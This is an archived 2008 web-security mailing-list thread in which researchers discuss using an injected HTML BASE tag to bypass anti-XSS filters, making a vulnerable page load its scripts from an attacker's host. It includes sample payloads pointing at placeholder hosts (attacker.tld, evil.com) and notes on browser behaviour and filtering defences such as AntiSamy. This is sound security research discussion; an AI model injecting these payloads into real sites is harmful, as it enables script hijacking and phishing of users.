[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [WEB SECURITY] Nice little XSS trick
- From: Bill Pennington <bill@xxxxxxxxxxxxxxx>
- Subject: Re: [WEB SECURITY] Nice little XSS trick
- Date: Wed, 16 Jul 2008 09:14:36 -0700 (PDT)
Well it's clear that All your <base href> are belong to us :-)
Come on someone had to say it!
---
Bill Pennington
VP Services
WhiteHat Security Inc.
http://www.whitehatsec.com
----- Original Message -----
From: "Arshan Dabirsiaghi" <arshan.dabirsiaghi@xxxxxxxxxxxxxxxxxx>
To: aksecurity@xxxxxxxxx, websecurity@xxxxxxxxxxxxx
Sent: Wednesday, July 16, 2008 6:52:45 AM GMT -08:00 US/Canada Pacific
Subject: Re: [WEB SECURITY] Nice little XSS trick
http://i8jesus.com/?p=10 (Jan 2008)
I also presented this vector last year at OWASP San Jose when I demoâed AntiSamy as an example of dangerous content that isnât malicious code on its own. Thatâs one of the selling points of AntiSamy â it stops not only XSS (well, we hope) but also prevents phishing attacks that abuse HTML/CSS.
I talked about it with RSnake afterwards and he had some crazy reason for not putting it on his cheatsheet â claimed it was too much like the <base href=âjavascript:foo();//â> vector. As noted on my blog post, IE7 is longer (according to policy) supposed to be honoring <base> tags outside of <HEAD>, but FF is still vulnerable. You could use this to hijack anything â stylesheets (more XSS/phishing), images, scripts, etc. The only thing <base> wonât help you steal as far as resources is anything gathered in JavaScript.
I think some of the big players had this figured out already (or more likely, just got really lucky). MySpace takes <base href> values, base64 encodes them, and redirects them through another domain. The flow is like this for them:
1. User puts in <base href=âhttp://evil.comâ;>
2. Str = base64(âhttp://evil.comâ;)
3. Profile = <base href=âhttp://msplinks.com/redir?<base64encodedStr>
Maybe thereâs a way to abuse that, but I donât think so. And eBay doesnât have any relative links after user content, at least when I first looked at this last year. They probably both just got lucky. =]
Arshan
---------- Previous message ----------
From: Amit Klein <aksecurity@xxxxxxxxx>
Date: Tue, Jul 15, 2008 at 7:33 AM
Subject: [WEB SECURITY] Nice little XSS trick
To: Web Security <websecurity@xxxxxxxxxxxxx>
Hi list
Recently I've been thinking about bypassing anti-XSS filters, and a nice little trick occurred to me, which I haven't seen anywhere (e.g. it's not on RSnake's XSS cheat sheet - http://ha.ckers.org/xss.html; it does mention BASe, but not the trick I describe here). The idea is to use the HTML BASE tag to force loading of JS code from the attacker's host. Consider a page with XSS vulnerability such as:
<html>
...
***XSS code may be embedded here***
...
<script src="/foo/bar.js"></script>
...
</html>
Now, an attacker can inject <base href="http://www.attacker.tld/";>, and next thing you know, the browser (IE, at least) loads the JS from http://www.attacker.tld/foo/bar.js... And the beauty is that there's no "explicit" JS code involved in the payload itself.
Note that according to the HTML standard, BASE should be placed in the HEAD section (http://www.w3.org/TR/html401/struct/links.html#edef-BASE). This is indeed observed by FF 2, but not by IE (checked IE6).
Thanks,
-Amit
----------------------------------------------------------------------------
Join us on IRC: irc.freenode.net #webappsec
Have a question? Search The Web Security Mailing List Archives:
http://www.webappsec.org/lists/websecurity/archive/
Subscribe via RSS:
http://www.webappsec.org/rss/websecurity.rss [RSS Feed]
Join WASC on LinkedIn
http://www.linkedin.com/e/gis/83336/4B20E4374DBA
Brought to you by http://www.webappsec.org
Search this site
|